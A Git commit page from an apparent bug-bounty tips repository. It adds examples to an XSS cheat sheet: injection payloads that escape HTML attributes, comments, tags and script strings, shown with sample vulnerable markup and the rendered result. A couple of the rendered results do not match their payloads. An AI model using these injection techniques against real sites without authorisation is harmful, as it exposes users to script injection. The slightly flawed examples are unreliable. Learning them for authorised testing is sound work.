ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 18:36:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

XSS [2]

Browse Source 
Add 2 tips and add the preview of the source code after inputting the payloads
This commit is contained in:
Muhammad Daffa 2020-09-14 09:27:09 +07:00 committed by GitHub
parent f3b7a38a68
commit 203e78791a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 70 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

73
XSS.md
View File

@ -17,6 +17,11 @@
<input id="keyword" type="text" name="q" value="REFLECTED_HERE"> <input id="keyword" type="text" name="q" value="REFLECTED_HERE">
``` ```
* After input the payload
```html
<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>
```
3. Add --> to escape the payload if input lands in HTML comments. 3. Add --> to escape the payload if input lands in HTML comments.
```html ```html
--><script>alert(1)</script> --><script>alert(1)</script>
@ -27,6 +32,11 @@
<!-- REFLECTED_HERE --> <!-- REFLECTED_HERE -->
``` ```
* After input the payload
```html
<!-- --><script>alert(1)</script> -->
```
4. Add </tag> when the input inside or between opening/closing tags, tag can be <a>,<title,<script> and any other HTML tags 4. Add </tag> when the input inside or between opening/closing tags, tag can be <a>,<title,<script> and any other HTML tags
```html ```html
</tag><script>alert(1)</script> </tag><script>alert(1)</script>
@ -38,10 +48,15 @@
<a class="item-pagination flex-c-m trans-0-4 active-pagination" href="https://target.com/1?status=REFLECTED_HERE">1</a> <a class="item-pagination flex-c-m trans-0-4 active-pagination" href="https://target.com/1?status=REFLECTED_HERE">1</a>
``` ```
* After input the payload
```html
<a class="item-pagination flex-c-m trans-0-4 active-pagination" href="https://target.com/1?status="></a><script>alert(1)</script>">1</a>
```
5. Use when input inside an attributes value of an HTML tag but > is filtered 5. Use when input inside an attributes value of an HTML tag but > is filtered
```html ```html
"onmouseover=alert(1) " onmouseover=alert(1)
"autofocus onfocus=alert(1) " autofocus onfocus=alert(1)
``` ```
* Example source code * Example source code
@ -49,6 +64,11 @@
<input id="keyword" type="text" name="q" value="REFLECTED_HERE"> <input id="keyword" type="text" name="q" value="REFLECTED_HERE">
``` ```
* After input the payload
```html
<input id="keyword" type="text" name="q" value="" onmouseover=alert(1)">
```
6. Use </script> when input inside <script> tags 6. Use </script> when input inside <script> tags
```html ```html
</script><script>alert(1)</script> </script><script>alert(1)</script>
@ -57,7 +77,54 @@
* Example source code * Example source code
```html ```html
<script> <script>
var sitekey = "REFLECTED_HERE" var sitekey = 'REFLECTED_HERE';
</script>
```
* After input the payload
```html
<script>
var sitekey = '</script>alert(1)</script>';
</script>
```
7. Use when input lands in a script block, inside a string delimited value.
```html
'-alert(1)-'
'/alert(1)//
```
* Example source code
```html
<script>
var sitekey = 'REFLECTED_HERE';
</script>
```
* After input the payload
```html
<script>
var sitekey = ''-alert(1)-'';
</script>
```
8. Same like Number 7. But inside a string delimited value but quotes are escaped by a backslash.
```html
\'alert(1)//
```
* If we input payload '-alert(1)-' it will be like this
```html
<script>
var sitekey = '\'-alert(1)-\'';
</script>
```
The quotes are escaped by a backslash so we need to bypass them
* After input the payload
```html
<script>
var sitekey = '\'alert(1)//';
</script> </script>
``` ```